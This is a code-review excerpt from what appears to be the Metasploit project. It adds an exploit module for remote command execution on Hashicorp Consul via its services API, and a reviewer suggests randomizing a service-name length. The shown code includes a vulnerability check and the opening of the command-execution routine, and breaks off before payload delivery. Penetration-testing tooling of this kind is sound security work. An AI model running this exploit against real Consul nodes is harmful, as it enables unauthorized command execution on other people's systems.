modules/exploits/multi/misc/consul_service_exec.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Hashicorp Consul Remote Command Execution via Services API",
+      'Description'    => %q{
+        This module exploits Hashicorp Consul's services API to gain remote command
+        execution on Consul nodes.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
+          'Francis Alexander <helofrancis[at]gmail.com >', # Discovery and PoC
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
+          [ 'URL', 'https://github.com/torque59/Garfield' ]
+        ],
+      'Platform'        => 'linux',
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'Payload'         => {},
+      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 11 2018'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
+        Opt::RPORT(8500)
+      ])
+  end
+
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(uri, "/v1/agent/self"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+    begin
+      agent_info = JSON.parse(res.body)
+      if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Safe
+      end
+    rescue JSON::ParserError
+      vprint_error 'Failed to parse JSON output.'
+      return CheckCode::Unknown
+    end
+  end
+
+
+  def execute_command(cmd, opts = {})
+    uri = target_uri.path
+    service_name = Rex::Text.rand_text_alpha(5)
```

Comment:
Can the length be randomized?

```suggestion
    service_name = Rex::Text.rand_text_alpha(5..10)
```

Reply:
Of course. I just tried a few time just to be sure and it works. Commiting your suggestion right now.